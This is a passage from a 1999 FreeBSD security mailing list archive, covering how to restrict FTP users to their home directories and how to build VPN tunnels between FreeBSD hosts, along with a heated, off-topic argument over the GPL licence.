distributed version there is a security hole, but that is not true of all GPL software. What is your reasoning? jay doscher jay@doscher.com ---------- >From: Brett Glass >To: Michael Richards <026809r@dragon.acadiau.ca>, erik >Cc: security@FreeBSD.ORG >Subject: Re: limit ftp users to their homedir >Date: Sat, Apr 24, 1999, 5:11 PM > > Don't use ProFTPd; it's GPLed. The BSD ftpd is capable of chrooting users > if you put their names in /etc/ftpchroot; see the man page. > > --Brett > > > At 07:29 PM 4/24/99 -0300, Michael Richards wrote: >>On Sun, 25 Apr 1999, erik wrote: >> >>> is there a way to deny a registered user access to anything but his own >>> homedirectory? >>Yes, we do it with ProFTPD. Works quite well. Make sure you install the >>latest version. I think the pre-release 1 had an exploit. >> >>-Michael >> >> >> >>To Unsubscribe: send mail to majordomo@FreeBSD.org >>with "unsubscribe freebsd-security" in the body of the message > > > "A man should learn to detect that gleam of light which flashes across his > mind from within, more than the lustre of the firmament of bards and sages. > Yet he dismisses without notice his thought, because it is his! In every > work of genius we recognize our own rejected thoughts; they come back to us > with a certain alienated majesty. Great works of art have no more affecting > lesson than this: they teach us to abide by our spontaneous impression with > good-humored inflexibility then most when the whole cry of voices is on the > other side. Else, tomorrow a stranger will say with masterly good sense > precisely what we have thought and felt all the time, and we shall be > forced to take with shame our own opinion from another." > > -- Ralph Waldo Emerson > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 20:38:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id D069A14A2D for ; Sat, 24 Apr 1999 20:38:11 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id VAA05866; Sat, 24 Apr 1999 21:35:28 -0600 (MDT) Message-Id: <4.2.0.32.19990424213135.0452f720@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sat, 24 Apr 1999 21:34:36 -0600 To: "Jay Doscher" , Michael Richards <026809r@dragon.acadiau.ca>, erik From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@FreeBSD.ORG In-Reply-To: <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.1 29]> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The stated design purpose of the GPL is to destroy businesses that sell commercial software, as well as programmers' livelihoods. This is a spiteful, vindictive goal that professional programmers -- not to mention consumers who would like to have the choice of buying commercial software -- should not promote. See Richard Stallman's writings, in particular, "The GNU Manifesto" and "Why Software Should Not Have Owners," for more. --Brett Glass At 08:21 PM 4/24/99 -0800, Jay Doscher wrote: >This may be a dumb question, but what in the heck is wrong with GPL >software? I will concede that with the widely distributed version there is >a security hole, but that is not true of all GPL software. What is your >reasoning? > > >jay doscher >jay@doscher.com "You're not just e-mailing her, you're e-mailing anyone she's ever e-mailed." -- Dayton Daily News Cartoonist Mike Peters on the "Melissa virus" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 24 20:45:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id C031814A2D for ; Sat, 24 Apr 1999 20:45:25 -0700 (PDT) (envelope-from petrilli@amber.org) Received: by trump.amber.org (Postfix, from userid 1000) id AEC691860C; Sat, 24 Apr 1999 23:46:04 -0400 (EDT) Message-ID: <19990424234604.J11094@amber.org> Date: Sat, 24 Apr 1999 23:46:04 -0400 From: Christopher Petrilli To: Brett Glass Cc: security@freebsd.org Subject: Re: limit ftp users to their homedir References: <19990425031538.UWDM6760.mail.rdc1.sdca.home.com@[24.4.93.1 29]> <4.2.0.32.19990424213135.0452f720@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.2.0.32.19990424213135.0452f720@localhost>; from Brett Glass on Sat, Apr 24, 1999 at 09:34:36PM -0600 X-Disclaimer: I hardly speak for myself, muchless anyone else. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can we please take the religion OFF the security list... it's just not relevent. Chris -- | Christopher Petrilli ``Television is bubble-gum for | petrilli@amber.org the mind.''-Frank Lloyd Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 1:32:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from acetylene.vapornet.net (acetylene.vapornet.net [209.100.218.11]) by hub.freebsd.org (Postfix) with ESMTP id E9A5C150C3 for ; Sun, 25 Apr 1999 01:32:35 -0700 (PDT) (envelope-from john@vapornet.net) Received: from datapit.home.vapornet.net (vapornet.xnet.com. [205.243.141.107]) by acetylene.vapornet.net (8.9.3/8.9.3/VaporServer 2.01) with ESMTP id DAA06423; Sun, 25 Apr 1999 03:32:30 -0500 (CDT) (envelope from: john@vapornet.net) Received: from habanero.chili-pepper.net (habanero.chili-pepper.net [192.168.0.11]) by datapit.home.vapornet.net (8.9.3/8.9.3/VaporServer 1.4) with ESMTP id DAA12476; Sun, 25 Apr 1999 03:32:29 -0500 (CDT) (envelope from: john@vapornet.net) Received: (from john@localhost) by habanero.chili-pepper.net (8.9.3/8.9.3/VaporClient v3.1) id DAA09485; Sun, 25 Apr 1999 03:32:27 -0500 (CDT) (envelope from: john@vapornet.net) From: John Preisler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Sun, 25 Apr 1999 03:32:27 -0500 (CDT) To: erik Cc: freebsd-security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14114.53550.598471.753465@habanero.chili-pepper.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I cant find the request I just got for this info, but in order to have this capability from login.conf(5) what you need to do is: 1. cd into src/libexec/ftpd 2. [assuming a bourney shell] $ export FTPD_INTERNAL_LS=true $ make install clean hopefully now you have an ftpd with the 'ls' command built-in 3. include the following entry into your desired login class in /etc/login.conf: :ftp-chroot: 4. cap_mkdb /etc/login.conf now everyone with that login class will be chrooted into their home directory when they ftp into your machine. hope this helps -j erik writes: > > is there a way to deny a registered user access to anything but his own > homedirectory? > > it would be nice if it was the same as with anonymous access.. ie. users > who cwd to "/" , > really enters the virtual ftp root instead of the real system root. > > is this possible to do with _none anonymous_ users? > > for example: > > in a normal setup, when user foo ftps to the system, the initial directory > will be > his homedirectory. when (for some reason) he cwd to "/" he will enter the > real system root. > can you limit him to only access his own stuff, ie. a cwd to / will bring > him to /home/fred. > > any suggestions appreciated! > > /erik > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 3:30:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.tepucom.nl (mail.tepucom.nl [195.81.12.5]) by hub.freebsd.org (Postfix) with ESMTP id 09F7514BDC for ; Sun, 25 Apr 1999 03:30:01 -0700 (PDT) (envelope-from theo@tepucom.nl) Received: from theo.tepucom.nl (localhost [127.0.0.1]) by mail.tepucom.nl (8.8.5/SCO5) with SMTP id MAA17830 for ; Sun, 25 Apr 1999 12:29:04 +0200 (CETDST) Received: by theo.tepucom.nl with Microsoft Mail id <01BE8F18.6DF1C1E0@theo.tepucom.nl>; Sun, 25 Apr 1999 12:37:49 +-200 Message-ID: <01BE8F18.6DF1C1E0@theo.tepucom.nl> From: Theo Purmer To: "'freebsd-security@freebsd.org'" Subject: VPN Date: Sun, 25 Apr 1999 12:37:48 +-200 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anybody know if its possible to make a vpn (tunnel) with two freebsd hosts? I cant find anything about tunneling or vpn in the manual pages Thanks Theo Purmer Tepucom The Netherlands To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 4:38:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from zeus.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id D8F5114D03 for ; Sun, 25 Apr 1999 04:38:08 -0700 (PDT) (envelope-from akm@zeus.theinternet.com.au) Received: (from akm@localhost) by zeus.theinternet.com.au (8.9.3/8.8.7) id VAA54390; Sun, 25 Apr 1999 21:36:43 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199904251136.VAA54390@zeus.theinternet.com.au> Subject: Re: VPN In-Reply-To: <01BE8F18.6DF1C1E0@theo.tepucom.nl> from Theo Purmer at "Apr 25, 1999 12:37:48 pm" To: theo@tepucom.nl (Theo Purmer) Date: Sun, 25 Apr 1999 21:36:43 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Theo Purmer ]--------------------------------------------- | Does anybody know if its possible | to make a vpn (tunnel) with two freebsd | hosts? | | I cant find anything about tunneling or | vpn in the manual pages Use the skip port. You can setup an encrypted tunnel between two hosts. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 4:48:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 5C49214D03 for ; Sun, 25 Apr 1999 04:48:52 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id VAA03984; Sun, 25 Apr 1999 21:18:51 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA06174; Sun, 25 Apr 1999 21:19:20 +0930 Date: Sun, 25 Apr 1999 21:19:19 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Theo Purmer Cc: "'freebsd-security@freebsd.org'" Subject: Re: VPN In-Reply-To: <01BE8F18.6DF1C1E0@theo.tepucom.nl> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 25 Apr 1999, Theo Purmer wrote: > Does anybody know if its possible > to make a vpn (tunnel) with two freebsd > hosts? Absolutely - a system of PPP tunneled over SSH works well for me (the SSH provides the encryption layer and PPP handles the networking). If you're going between two freebsd hosts then tyou're probably best-off using the user-mode ppp driver (man 8 ppp) which is generally "better" than the alternative pppd. I haven't done this with ppp(8), but probably the way to go is to use the PPP-over-TCP function and connect to localhost:someport on both ends, and set up SSH to provide an encrypted tunnel via the -Lsomeport:remotehost:someport option. If you're wanting to communicate with a non-FreeBSD UNIX box then your best bet is probably PPPD (kernel-mode ppp) - I haven't figured out how to make ppp(8) inter-operate with pppd(8) when used as a tunnel (if anyone knows how to make this work it would be helpful). Actually the version of PPPD in the base tree doesn't support this as easily as the latest version (v2.3.7) - your best bet would be to compile it separately (which is simple). Using pppd I just do something like: pppd pty "ssh -t remote.host.com pppd" and then set up the network routes to route the desired IP addresses over the tunnel. These are both good "poor man's" solutions - a technically superior solution (less overhead from all the layering and encapsulations) is IPSEC - look into the KAME stuff if you're interested (www.kame.net). Kris ----- The Feynman problem-solving algorithm: 1. Write down the problem 2. Think real hard 3. Write down the solution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 6:41:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com (zogbe.tasam.com [198.232.144.254]) by hub.freebsd.org (Postfix) with ESMTP id 057B914D16 for ; Sun, 25 Apr 1999 06:41:26 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by zogbe.tasam.com (8.8.8/8.8.8) with SMTP id JAA09961; Sun, 25 Apr 1999 09:39:55 -0400 (EDT) (envelope-from freebsd.list@bug.tasam.com) Message-ID: <004901be8f21$327e3fe0$7271a1ce@tasam.com> From: "Joe Gleason" To: "Andrew Kenneth Milton" , "Theo Purmer" Cc: References: <199904251136.VAA54390@zeus.theinternet.com.au> Subject: Re: VPN Date: Sun, 25 Apr 1999 09:36:45 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What OSI layer does skip work on? Joe Gleason ----- Original Message ----- From: Andrew Kenneth Milton To: Theo Purmer Cc: Sent: Sunday, April 25, 1999 07:36 Subject: Re: VPN > +----[ Theo Purmer ]--------------------------------------------- > | Does anybody know if its possible > | to make a vpn (tunnel) with two freebsd > | hosts? > | > | I cant find anything about tunneling or > | vpn in the manual pages > > Use the skip port. > > You can setup an encrypted tunnel between two hosts. > > -- > Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew > The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton > ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 7: 1:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from shattered.disturbed.net (shattered.disturbed.net [192.139.81.180]) by hub.freebsd.org (Postfix) with ESMTP id 5FE2914D16 for ; Sun, 25 Apr 1999 07:01:50 -0700 (PDT) (envelope-from veers@disturbed.net) Received: from shattered.disturbed.net ([192.139.81.180]:46342 "EHLO shattered" ident: "IDENT-NONSENSE") by disturbed.net with ESMTP id <61521-49660>; Sun, 25 Apr 1999 10:06:19 -0400 Date: Sun, 25 Apr 1999 10:06:16 -0400 (EDT) From: Alex Perel To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: <4.2.0.32.19990424191010.04521e00@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 24 Apr 1999, Brett Glass wrote: > Don't use ProFTPd; it's GPLed. The BSD ftpd is capable of chrooting users > if you put their names in /etc/ftpchroot; see the man page. Brett, Give it a rest, eh? People are tired of your dogma, PARTICULARLY in a security-oriented mailing list. I've yet to use a license as a decision-making factor in the software I use, and I'm sure I'm not alone. If you don't want do use GPL'd software, don't. Your zealotry is not wanted here. Get it? (and don't bother replying to this either) Alex G. Perel -=- AP5081 alexp@iplink.net -=- (work) veers@disturbed.net -=- (play) Disturbed Networks - Powered exclusively by FreeBSD == The Power to Serve -=- http://www.freebsd.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 7:33:55 1999 Delivered-To: freebsd-security@freebsd.org Received: from zeus.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 48422150EA for ; Sun, 25 Apr 1999 07:33:49 -0700 (PDT) (envelope-from akm@zeus.theinternet.com.au) Received: (from akm@localhost) by zeus.theinternet.com.au (8.9.3/8.8.7) id AAA60561; Mon, 26 Apr 1999 00:32:07 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199904251432.AAA60561@zeus.theinternet.com.au> Subject: Re: VPN In-Reply-To: <004901be8f21$327e3fe0$7271a1ce@tasam.com> from Joe Gleason at "Apr 25, 1999 9:36:45 am" To: freebsd.list@bug.tasam.com (Joe Gleason) Date: Mon, 26 Apr 1999 00:32:07 +1000 (EST) Cc: theo@tepucom.nl, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Joe Gleason ]--------------------------------------------- | What OSI layer does skip work on? This from the pkg/DESCR file for the skip port. This is from http://skip.incog.com: SKIP - Simple Key management for Internet Protocols IP-Level Cryptography Secure every application with one protocol SKIP secures the network at the IP packet level. Any networked application gains the benefits of encryption, without requiring modification. SKIP is unique in that an Internet host can send an encrypted packet to another host without requiring a prior message exchange to set up a secure channel. SKIP is particularly well-suited to IP networks, as both are stateless protocols. -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 7:55:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from zogbe.tasam.com (zogbe.tasam.com [198.232.144.254]) by hub.freebsd.org (Postfix) with ESMTP id 22C431527B for ; Sun, 25 Apr 1999 07:55:35 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by zogbe.tasam.com (8.8.8/8.8.8) with SMTP id KAA10073; Sun, 25 Apr 1999 10:55:12 -0400 (EDT) (envelope-from freebsd.list@bug.tasam.com) Message-ID: <002301be8f2b$a88644d0$7271a1ce@tasam.com> From: "Joe Gleason" To: "Andrew Kenneth Milton" Cc: , References: <199904251432.AAA60561@zeus.theinternet.com.au> Subject: Re: VPN Date: Sun, 25 Apr 1999 10:55:15 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So I take that to mean layer 6, where it should be. Sounds cool, I will probably spend a good part of the day playing with it. Joe Gleason Tasam > +----[ Joe Gleason ]--------------------------------------------- > | What OSI layer does skip work on? > > This from the pkg/DESCR file for the skip port. > > This is from http://skip.incog.com: > > SKIP - Simple Key management for Internet Protocols > > IP-Level Cryptography > Secure every application with one protocol > > SKIP secures the network at the IP packet level. Any networked > application gains the benefits of encryption, without requiring > modification. SKIP is unique in that an Internet host can send an > encrypted packet to another host without requiring a prior message > exchange to set up a secure channel. SKIP is particularly well-suited > to IP networks, as both are stateless protocols. > > -- > Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew > The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton > ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig > PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8: 8: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 8183E15286 for ; Sun, 25 Apr 1999 08:08:03 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08924; Sun, 25 Apr 1999 09:07:59 -0600 (MDT) Message-Id: <4.2.0.32.19990425090254.0453a660@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sun, 25 Apr 1999 09:07:19 -0600 To: Alex Perel From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: security@FreeBSD.ORG In-Reply-To: References: <4.2.0.32.19990424191010.04521e00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:06 AM 4/25/99 -0400, Alex Perel wrote: >Give it a rest, eh? People are tired of your dogma, PARTICULARLY in a >security-oriented mailing list. What I am stating isn't dogma; it's verifiable fact. It is, rather, the GPL that cloaks itself in dogma. >I've yet to use a license as a >decision-making factor in the software I use, and I'm sure I'm not alone. This is unfortunate. The GPL and its promoters rely on this in order to maximize the GPL's negative impact on legitimate commercial developers. Rather than turning this into a long-winded discussion, I invite those who are interested in these issues to READ the GPL and also Stallman's own writings. "The GNU Manifesto," "Why Software Should Not Have Owners," and "Confusing Words You Might Wish to Avoid," all available at http://www.gnu.org, express Stallman's dogma and malicious intent very clearly. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8: 9:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 344E9152F2 for ; Sun, 25 Apr 1999 08:09:16 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA08921; Sun, 25 Apr 1999 09:07:57 -0600 (MDT) Message-Id: <4.2.0.32.19990425090124.0453b8e0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sun, 25 Apr 1999 09:02:41 -0600 To: John Preisler , erik From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <14114.53550.598471.753465@habanero.chili-pepper.net> References: <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> <3.0.6.32.19990425001944.00904430@chapman.karlskrona.se> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Note that if you don't have the full OS source on your system, you can bring in JUST the sources for ftpd and ls. This is what I frequently do when building ftpd. (Having an internal ls really should be the default, IMHO.) --Brett At 03:32 AM 4/25/99 -0500, John Preisler wrote: >I cant find the request I just got for this info, but in order to have >this capability from login.conf(5) what you need to do is: > >1. cd into src/libexec/ftpd >2. [assuming a bourney shell] > $ export FTPD_INTERNAL_LS=true > $ make install clean > >hopefully now you have an ftpd with the 'ls' command built-in > >3. include the following entry into your > desired login class in /etc/login.conf: > :ftp-chroot: > >4. cap_mkdb /etc/login.conf > >now everyone with that login class will be chrooted into their home >directory when they ftp into your machine. > > >hope this helps > >-j > > > >erik writes: > > > > is there a way to deny a registered user access to anything but his own > > homedirectory? > > > > it would be nice if it was the same as with anonymous access.. ie. users > > who cwd to "/" , > > really enters the virtual ftp root instead of the real system root. > > > > is this possible to do with _none anonymous_ users? > > > > for example: > > > > in a normal setup, when user foo ftps to the system, the initial directory > > will be > > his homedirectory. when (for some reason) he cwd to "/" he will enter the > > real system root. > > can you limit him to only access his own stuff, ie. a cwd to / will bring > > him to /home/fred. > > > > any suggestions appreciated! > > > > /erik > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > >-- > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8:10:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 56722152D6 for ; Sun, 25 Apr 1999 08:10:14 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id RAA08944; Sun, 25 Apr 1999 17:10:10 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id RAA23578; Sun, 25 Apr 1999 17:10:09 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199904251510.RAA23578@greenpeace.grondar.za> To: Brett Glass Cc: Alex Perel , security@FreeBSD.ORG Subject: Re: limit ftp users to their homedir In-Reply-To: Your message of " Sun, 25 Apr 1999 09:07:19 CST." <4.2.0.32.19990425090254.0453a660@localhost> References: <4.2.0.32.19990424191010.04521e00@localhost> <4.2.0.32.19990425090254.0453a660@localhost> Date: Sun, 25 Apr 1999 17:10:08 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > At 10:06 AM 4/25/99 -0400, Alex Perel wrote: > > >Give it a rest, eh? People are tired of your dogma, PARTICULARLY in a > >security-oriented mailing list. > > What I am stating isn't dogma; it's verifiable fact. It is, rather, the > GPL that cloaks itself in dogma. This has _ZERO_ to do with security. Please take it offline or to an advocacy/chat list. Thanks! M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8:15:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 930C6152D6 for ; Sun, 25 Apr 1999 08:15:33 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id JAA09005; Sun, 25 Apr 1999 09:15:01 -0600 (MDT) Message-Id: <4.2.0.32.19990425091223.00d20ee0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.32 (Beta) Date: Sun, 25 Apr 1999 09:14:24 -0600 To: Mark Murray From: Brett Glass Subject: Re: limit ftp users to their homedir Cc: Alex Perel , security@FreeBSD.ORG In-Reply-To: <199904251510.RAA23578@greenpeace.grondar.za> References: <4.2.0.32.19990424191010.04521e00@localhost> <4.2.0.32.19990425090254.0453a660@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:10 PM 4/25/99 +0200, Mark Murray wrote: >This has _ZERO_ to do with security. Please take it offline or to >an advocacy/chat list. I have already recommended that people read the relevant information rather than continuing the discussion in this forum. The issue is important, however; to those of us who understand what the GPL is and does, the presence or absence of the GPL is an important selection criterion. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 25 8:19:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from trump.amber.org (trump.amber.org [209.31.146.82]) by hub.freebsd.org (Postfix) with ESMTP id 8C3B6152D6 for ; Sun, 25 Apr 1999 08:19:52 -0700 (PDT) (envelope-from petrilli@amber.org) Received: by trump.amber.org (Postfix, from userid 1000) id 592381860C; Sun, 25 Apr 1999 11:20:36 -0400 (EDT) Message-ID: <19990425112036.D18505@amber.org> Date: Sun, 25 Apr 1999 11:20:36 -0400 From: Christopher Petrilli To: Brett Glass Cc: security@freebsd.org Subject: Re: limit ftp users to their homedir References: <4.2.0.32.19990424191010.04521e00@localhost> <4.2.0.32.19990425090254.0453a660@localhost> <199904251510.RAA23578@greenpeace.grondar.za> <4.2.0.32.19990425091223.00d20ee0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.2.0.32.19990425091223.00d20ee0@localhost>; from Brett Glass on Sun, Apr 25, 1999 at 09:14:24AM -0600 X-Disclaimer: I hardly speak for myself, muchless anyone else. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: 